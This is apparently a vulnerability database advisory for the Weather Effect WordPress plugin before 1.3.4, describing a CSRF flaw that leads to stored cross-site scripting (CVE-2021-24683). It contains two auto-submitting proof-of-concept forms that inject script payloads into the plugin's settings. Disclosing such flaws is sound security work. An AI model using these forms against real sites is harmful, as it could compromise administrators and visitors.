WordPress Plugin Vulnerabilities

Weather Effect < 1.3.4 - CSRF to Stored Cross-Site Scripting

Description

The plugin does not have any CSRF checks in place when saving its settings, and do not validate or escape them, which could lead to Stored Cross-Site Scripting issue.

v1.3.4 fixed the CSRF, but not the sanitisation/escaping fully. Another issue has been created for it

Proof of Concept

To have the XSS only trigger in the frontend:

<form action="https://example.com/wp-admin/admin.php?page=weather-effects-setting" method="post" id="csrf">
<input type="hidden" name="enable_weather_effect" value="1">
<input type="hidden" name="weather_occasion" value="christmas_check">
<input type="hidden" name="christmas_types" value="snow_effect">
<input type="hidden" name="ball" value="ball">
<input type="hidden" name="christmas_ball" value="ball3">
<input type="hidden" name="bell" value="bell">
<input type="hidden" name="christmas_bell" value="bell3">
<input type="hidden" name="christmas_candy" value="candy3">
<input type="hidden" name="christmas_gift" value="gift3">
<input type="hidden" name="christmas_snowman" value="snowman3">
<input type="hidden" name="christmas_snow_flake" value="flack2">
<input type="hidden" name="christmas_min_size_leaf" value="alert(location)||30">
<input type="hidden" name="christmas_max_size_leaf" value="50">
<input type="hidden" name="christmas_flakes_leaf" value="5">
<input type="hidden" name="christmas_speed" value="5">
<input type="hidden" name="snow_action" value="save_setting">
</form>
<script>csrf.submit()</script>

XSS Trigger in the backend as well:
<form action="https://example.com/wp-admin/admin.php?page=weather-effects-setting" method="post" id="csrf">
<input type="hidden" name="enable_weather_effect" value="1">
<input type="hidden" name="weather_occasion" value="christmas_check">
<input type="hidden" name="christmas_types" value="snow_effect">
<input type="hidden" name="ball" value="ball">
<input type="hidden" name="christmas_ball" value="ball3">
<input type="hidden" name="bell" value="bell">
<input type="hidden" name="christmas_bell" value="bell3">
<input type="hidden" name="christmas_candy" value="candy3">
<input type="hidden" name="christmas_gift" value="gift3">
<input type="hidden" name="christmas_snowman" value="snowman3">
<input type="hidden" name="christmas_snow_flake" value="flack2">
<input type="hidden" name="christmas_min_size_leaf" value='"><img src onerror=alert(/XSS/)>'>
<input type="hidden" name="christmas_max_size_leaf" value="50">
<input type="hidden" name="christmas_flakes_leaf" value="5">
<input type="hidden" name="christmas_speed" value="5">
<input type="hidden" name="snow_action" value="save_setting">
</form>
<script>csrf.submit()</script>

Affects Plugins

Plugin icon
weather-effect
Fixed in 1.3.4

References

CVE
CVE-2021-24683

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
8.8 (high)

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
54f95b51-5804-4bee-9e4a-f73b8ef9bbd5

Timeline

Publicly Published
2021-09-07 (about 2 years ago)
Added
2021-09-07 (about 2 years ago)
Last Updated
2023-01-30 (about 1 years ago)

Other

Published
Title
Published
2023-11-28
Title
WooCommerce Login Redirect <= 2.2.4 - Cross-Site Request Forgery
Published
2023-11-15
Title
Elementor Addon Elements < 1.12.8 - Elementor Addon Element Enabling/Disabling via CSRF
Published
2021-08-25
Title
Nested Pages < 3.1.16 - CSRF to Arbitrary Post Deletion and Modification
Published
2021-07-05
Title
WooCommerce Extra Cost <= 2.6 - CSRF Bypass
Published
2014-12-12
Title
Simple Ip Ban <= 1.2.3 - Multiple CSRF